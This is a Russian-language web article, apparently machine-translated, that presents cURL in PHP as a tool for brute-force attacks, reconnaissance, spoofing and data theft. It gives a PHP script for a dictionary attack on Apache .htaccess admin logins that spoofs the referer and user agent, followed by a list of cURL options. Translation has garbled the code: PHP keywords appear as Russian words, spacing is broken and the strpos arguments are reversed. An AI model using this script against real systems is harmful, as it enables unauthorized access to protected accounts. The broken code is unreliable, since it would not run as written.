Вам бонус- начислено 1 монета за дневную активность. Сейчас у вас 1 монета

CURL инструмент, который можно использовать для принудительного ввода параметров в веб-запрос

Практика



cURL  ( Client URL_, библиотека, созданная Дэниелом Стенбергом, представляет собой инструмент, основанный преимущественно на командной строке, который можно использовать для принудительного ввода параметров в веб-запрос. Библиотека cURL была портирована на PHP как дополнительный модуль и может быть полезна при попытке получить разведывательную информацию или несанкционированный доступ к указанному URL.

CURL и PHP

PHP поддерживает libcurl, который в настоящее время поддерживает протоколы http, https, ftp, gopher, telnet, dict, file и ldap. libcurl также поддерживает сертификаты HTTPS, HTTP POST, HTTP PUT, загрузку по FTP (это также можно сделать с расширением ftp в PHP), загрузку на основе форм HTTP, прокси-серверы, файлы cookie и аутентификацию пользователя + пароль. cURL может использоваться в сочетании с PHP-сценариями для атак методом перебора (включая перебор таблицы SQL-инъекций), разведывательных атак, подмены и кражи данных.

Сценарий грубой силы

Следующий скрипт cURL может быть использован для грубой принудительной аутентификации Apache .htaccess:

<? php 
$ ref  =  "http://www.example.com/index.php" ;       // Установить реферер на обман
 
$ denied  =  "Запрещено" ;                           // Устанавливаем вывод "Отклонено"
 
$ wordlist  =  "/var/www/wordlist.txt" ;             // Установить местоположение списка слов
 
set_time_limit (  0  ) ;                             // Установить лимит выполнения скрипта. 0 = без ограничений
 
$ ch  =  curl_init (  ) ;                              // Инициализация cURL 
curl_setopt (  $ ch , CURLOPT_RETURNTRANSFER ,  1 ) ;    // Установить RETURNTRANSFER в TRUE 
curl_setopt (  $ ch , CURLOPT_FOLLOWLOCATION ,  1 ) ;    // Установить FOLLOWLOCATION в TRUE 
curl_setopt (  $ ch , CURLOPT_REFERER ,  $ ref ) ;         // Установить для REFERER значение $ ref 
curl_setopt (  $ ch , CURLOPT_USERAGENT , «Mozilla / 4.0 (совместимо; MSIE 5.01; Windows NT 5.0)» ) ;  // Spoof User Agent
 
foreach (  файл (  $ wordlist  )  как  $ пароль  )        // Запуск цикла для атаки по словарю 
{ 
    $ force  =  "http: // admin: {$ password} @ www.example.com / admin /" ;  // Установить URL для атаки, 
    curl_setopt (  $ ch , CURLOPT_URL ,  $ force  ) ;       // Загружаем URL для атаки с помощью cURL 
    $ check  =  curl_exec (  $ ch  ) ;                   // Установить параметры для проверки, 
    если (  ! Strpos (  $ denied , $ check  )  )              // Проверяем, нет ли $ denied на странице 
    { 
        die (  "Успешно! Пароль: {$ password} "  ) ;  // Если $ denied возвращает false, успех 
    } 
} 
curl_close (  $ ch  ) ;                               // Закрыть процесс cURL 
?>

Полезные опции PHP cURL

CURLOPT_FOLLOWLOCATION

  • ВЕРНО, чтобы следовать любому заголовку «Location:», который сервер отправляет как часть заголовка HTTP (обратите внимание, что это рекурсивно, PHP будет следовать столько же заголовков «Location:», сколько отправлено, если не установлено CURLOPT_MAXREDIRS ).

CURLOPT_POST

  • CURLOPT_POSTFIELDS

CURLOPT_COOKIE

  • Содержимое заголовка «Set-Cookie:» для использования в HTTP-запросе.

CURLOPT_COOKIEFILE

  • Имя файла, содержащего данные cookie. Файл cookie может быть в формате Netscape или просто в виде заголовков в стиле HTTP, выгруженных в файл.

CURLOPT_COOKIEJAR

  • Имя файла, в который сохраняются все внутренние куки, когда соединение закрывается.
создано: 2020-07-02
обновлено: 2021-03-13
108



Рейтиг 9 of 10. count vote: 2
Вы довольны ?:


Поделиться:

Найди готовое или заработай

С нашими удобными сервисами без комиссии*

Как это работает? | Узнать цену?

Найти исполнителя
$0 / весь год.
  • У вас есть задание, но нет времени его делать
  • Вы хотите найти профессионала для выплнения задания
  • Возможно примерение функции гаранта на сделку
  • Приорететная поддержка
  • идеально подходит для студентов, у которых нет времени для решения заданий
Готовое решение
$0 / весь год.
  • Вы можите продать(исполнителем) или купить(заказчиком) готовое решение
  • Вам предоставят готовое решение
  • Будет предоставлено в минимальные сроки т.к. задание уже готовое
  • Вы получите базовую гарантию 8 дней
  • Вы можете заработать на материалах
  • подходит как для студентов так и для преподавателей
Я исполнитель
$0 / весь год.
  • Вы профессионал своего дела
  • У вас есть опыт и желание зарабатывать
  • Вы хотите помочь в решении задач или написании работ
  • Возможно примерение функции гаранта на сделку
  • подходит для опытных студентов так и для преподавателей

Комментарии


Оставить комментарий
Если у вас есть какое-либо предложение, идея, благодарность или комментарий, не стесняйтесь писать. Мы очень ценим отзывы и рады услышать ваше мнение.
To reply

информационная безопасность - Криптография и Криптоанализ. Стеганография. Защита Информации

Термины: информационная безопасность - Криптография и Криптоанализ. Стеганография. Защита Информации